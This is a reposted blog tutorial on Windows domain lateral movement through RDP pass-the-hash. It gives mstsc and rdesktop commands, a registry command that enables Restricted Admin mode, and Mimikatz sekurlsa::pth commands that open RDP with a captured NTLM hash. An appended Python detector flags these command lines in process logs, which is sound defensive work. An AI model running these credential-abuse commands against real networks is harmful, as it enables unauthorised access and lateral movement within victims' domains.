
Domain lateral movement: RDP pass-the-hash

2022-05-15 07:42:15 Low risk performing artist

Domain lateral movement: RDP pass-the-hash with Mimikatz
Besides connections over the other protocols covered above (IPC, WMI, SMB), a captured plaintext password or hash can also be used to connect over the RDP protocol.
Note: RDP is to Windows what SSH is to Linux, a remote connection protocol. It is the service commonly referred to as port 3389.

RDP connection with a plaintext password
mstsc.exe /console /v:192.168.3.21 /admin
rdesktop 192.168.3.21:3389
RDP connection with a hash
The Windows server needs Restricted Admin mode enabled. It is on by default in Windows 8.1 and Windows Server 2012 R2, and Windows 7 and Windows Server 2008 R2 also support it once patches 2871997/2973351 are installed. Command to enable it:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
Then run:
mstsc.exe /restrictedadmin

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208sdlfkjssdlfksj "/run:mstsc.exe /restrictedadmin"
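
On the defensive side, the commands above leave recognisable process command lines. The following is an added example, not part of the original post, that flags them in process-creation logs; the label names, the function names and the constructed sample lines (including the host fileserver01) are assumptions.

```python
import re

QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"'})  # pasted curly quotes -> straight
REG_ADD = re.compile(r'\breg(\.exe)?"?\s+add\b')
# Match the Lsa key itself, not subkeys such as ...\Lsa\MSV1_0
LSA_KEY = re.compile(r'\\system\\currentcontrolset\\control\\lsa"?(\s|$)')
VALUE = re.compile(r'/v\s+"?disablerestrictedadmin"?(\s|$)')
DATA = re.compile(r'/d\s+"?(0x[0-9a-f]+|[0-9]+)"?(\s|$)')


def classify(cmdline):
    """Return a label (names are this example's own) for one command line, or None."""
    line = cmdline.translate(QUOTES).lower()
    if REG_ADD.search(line) and LSA_KEY.search(line) and VALUE.search(line):
        m = DATA.search(line)
        # Data may be written as 0, 00000000 or 0x0; only zero turns the mode on.
        if m and int(m.group(1), 16 if m.group(1).startswith("0x") else 10) == 0:
            return "restricted-admin-enabled"
        return None  # e.g. /d 1, which switches the mode back off
    if "sekurlsa::pth" in line:
        return "pth-launcher"
    if "mstsc" in line and "/restrictedadmin" in line:
        return "rdp-restricted-admin-client"
    return None


def scan(cmdlines):
    """Return (index, label) for every command line that matched."""
    return [(i, label) for i, c in enumerate(cmdlines) if (label := classify(c))]


# Constructed sample command lines (not real log data); fileserver01 is a made-up host.
SAMPLE = [
    r'reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f',
    'REG.EXE ADD \u201cHKLM\\System\\CurrentControlSet\\Control\\Lsa\u201d /v DisableRestrictedAdmin /t REG_DWORD /d 0x0 /f',
    r'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f',
    r'reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin',
    'mstsc.exe /v:fileserver01 /restrictedadmin',
    'mstsc.exe /v:fileserver01 /admin',
    'mimikatz.exe "sekurlsa::pth /user:administrator /domain:god /ntlm:<HASH_PLACEHOLDER> /run:mstsc.exe /restrictedadmin"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same matching can be applied to the command-line field of whatever process-creation telemetry is collected; a write of 1 to DisableRestrictedAdmin is deliberately not flagged because it turns the mode off.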

Copyright notice
Author: [Low risk performing artist]. Please include the original link when reprinting, thank you.
https://en.chowdera.com/2022/131/202205102126591958.html
